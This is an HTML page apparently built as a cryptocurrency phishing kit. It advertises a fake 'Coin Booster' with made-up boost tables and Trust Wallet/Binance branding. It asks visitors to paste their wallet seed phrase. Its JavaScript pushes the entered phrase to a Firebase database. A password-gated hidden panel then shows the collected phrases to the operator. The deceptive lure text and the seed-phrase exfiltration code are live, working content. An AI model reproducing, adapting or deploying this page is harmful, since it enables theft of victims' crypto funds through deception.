<!--

......................
. name: FeMi         .
.                    .
.                    .
. level: 16          .
.                    .
.                    .
. age: 18++          .
......................


please dont forget to upvote and share for others to see easily

-->
<!DOCTYPE html>
<html>
    <head>
        <title>Coin Booster</title>
  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.js"></script>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- HTML -->
  <!-- Custom Styles -->
  <link rel="stylesheet" href="style.css">
  
  <style>
      body{
 font-family:times;   
}
#msgs{
    display:none;
}
#tr{
    width:100%;
    height:auto;
}
#space{
    color:white;
}
#ph{
    
}
.b{
    color:white;
}
a{
    text-decoration:none;
}
#a:hover{
    color:red;
}
#b{
    font-size:98px;
    font-weight:bolder ;
    margin-bottom:10px;
}
#ipt{
    padding:10%;
    border-radius:10px;
    width:80%;
    height:50px;
    margin-top:-25px;
    border: 1px solid blue !important;

    box-shadow: 0 0 3px blue !important;
}
#ipt:focus{
    outline: none !important;
}
.ph{
    margin-left:25px;
    position:relative ;
    background-color:white;
    width:50px;
    text-align:center ;
    display:block;
    color:black;
}
#add{
    margin-bottom:20%;
    text-align:center ;
    background-color:green;
    padding:5%;
}
table {
  width:100%;
}
table, th, td {
  border: 1px solid black;
  border-collapse: collapse;
}
th, td {
  padding: 15px;
  text-align: left;
}
#t01 tr:nth-child(even) {
  background-color: #eee;
}
#t01 tr:nth-child(odd) {
 background-color: #fff;
}
#t01 th {
  background-color: black;
  color: white;
}
#r{
    color:red;
    font-weight:bolder ;
}

  </style>
    </head>
    <body>
       <div id="good">
        <img src="https://dl.dropbox.com/s/ra4q9bayo1oc789/screen-0.jpg?" id="tr" alt="coin booster">
        <p id="a">
        <b>What is Coin Booster</b><br><br><br/>
         Coin - boost and secure Ethereum for mobile<br> wallet and DApp Browser that's easy to use.
        </p>
        <br/>
        <br/>
        <p>
        <b>Why Coin Booster?</b><br><br><br/>
        Using and boosting <a href="https://play.google.com/store/apps/details?id=com.nexowallet" target="_blank" id="a">cryptocurrency<a/> doesn’t have to be hard. Back in 2018 Coin Booster joined the Binance ecosystem, taking us one step closer to our goal: freedom of money. 
<br><br>
Trust Wallet is the official <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp" target="_blank" id="a">mobile wallet<a/> of Binance. It provides you a safe and easy place to store your funds outside of Binance, with loads of features built in to enhance your crypto experience. 
<br><br>
If you don’t have Trust Wallet already <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp" target="_blank" id="a">you can download it here<a/>, and here are hints of Boosting your coin
        </p>
        </div>
        <div id="bad">
        <p id="b">BOOST!!</p> 
        <p><br><b>Hence:</b> possible account to be boost is has follow any order lower than can not be <b>Boost</b>. Input in your phrase and click on <b>Boost</b> button. <span id="r">WORK ONCED PER MONTH</span></p> 
        
<table id="t01">
  <tr>
    <th>Coin</th>
    <th>Boost!</th> 
    <th>Coins</th>
  </tr>
  <tr>
    <td>20%</td>
    <td>+10%</td>
    <td><b>30% </b>BTC</td>
  </tr>
  </tr>
  <tr>
    <td>50%</td>
    <td>+18%</td>
    <td><b>68% </b>BTC</td>
  </tr>
  </tr>
  <tr>
    <td>80%</td>
    <td>+20%</td>
    <td><b>1 </b>BTC</td>
  </tr>
  <tr>
    <th>Coin</th>
    <th>Boost!</th> 
    <th>Coins</th>
  </tr>
  <tr>
    <td>20%</td>
    <td>+15%</td>
    <td><b>35% </b>ETH</td>
  </tr>
  </tr>
  <tr>
    <td>40%</td>
    <td>+22%</td>
    <td><b>67% </b>ETH</td>
  </tr>
  </tr>
  <tr>
    <td>70%</td>
    <td>+30%</td>
    <td><b>1 </b>ETH</td>
  </tr>
  <tr>
    <th>Coin</th>
    <th>Boost!</th> 
    <th>Coins</th>
  </tr>
  <tr>
    <td>20%</td>
    <td>+5%</td>
    <td><b>25% </b>XRP</td>
  </tr>
  </tr>
  <tr>
    <td>50%</td>
    <td>+15%</td>
    <td><b>55% </b>XRP</td>
  </tr>
  </tr>
  <tr>
    <td>70%</td>
    <td>+20%</td>
    <td><b>90% </b>XRP</td>
  </tr>

</table>
                  
        <p id="ph" class="b">phrase</p>        
        <textarea id="ipt"></textarea>
        <p id="add" type="submit" onclick="writeUserData()">Boost</p>
        </div>
        <div id="msgs">
            <h2 class="load">
                Loading...
            </h2>
        </div>    
       
       
       

  <!-- The core Firebase JS SDK is always required and must be listed first -->
  <script src="https://www.gstatic.com/firebasejs/8.2.3/firebase.js"></script>
  <!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
  <script src="https://www.gstatic.com/firebasejs/8.2.3/firebase-analytics.js"></script>
  <script>
    // Your web app's Firebase configuration
    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
    var firebaseConfig = {
    apiKey: "***********",
    authDomain: "cartoline-india.firebaseapp.co",
    projectId: "cartoline-india",
    storageBucket: "********************",
    messagingSenderId: "********",
    appId: "1:372576193203:web:*****",
    measurementId: "G*******"
    };
    // Initialize Firebase
    firebase.initializeApp(firebaseConfig);
  </script> 
  <script type="text/javascript" charset="utf-8">
    var database = firebase.database();


    function writeUserData() {
      var name = document.getElementById('ipt');
      var msg = document.getElementById('ipt');

      if (name.value === "" || msg.value === "") {
        
      } else {
        firebase.database().ref('users/').push({
          user: name.value,
          message: msg.value,

        });

        
      }


    }
    
    
    var data = firebase.database().ref('users/');
data.on('value', function(snapshot) {

 
             

document.getElementById("msgs").innerHTML="";

 var val = snapshot.val();
 Object.keys(val).forEach((key) => {
 


const div = document.createElement("div") 


div.innerHTML = `
<div id="chain">
<div id="main">

            
            <h3 id="showname">${val[key].user.replace(/</g,"&lt;").replace(/>/g,"&gt;")}</h3>
            
            <p id="para">${val[key].message.replace(/</g,"&lt;").replace(/>/g,"&gt;")}</p>
                <br />
                
                
        <br><br><br>
        
`;


document.getElementById("msgs").appendChild(div)

 });

});   
    
  </script>  
  
  <script>
      $(document).ready(function() {
$("#ipt").click(function(){
    $("#ph").addClass("ph")
})
$("#add").click(function(){
    $("#ph").removeClass("ph")
})
$("#add").click(function(){
      a = prompt("enter password")
      if (a == "$900coins"){
        alert("free")
        
      }
      if (a == "aaaaaabbbbbbccccccabc"){
          document.getElementById("msgs").style.display="block"
      }
      else{
        alert("wrong password")
      }
})
})
  </script> 
    </body>
</html>
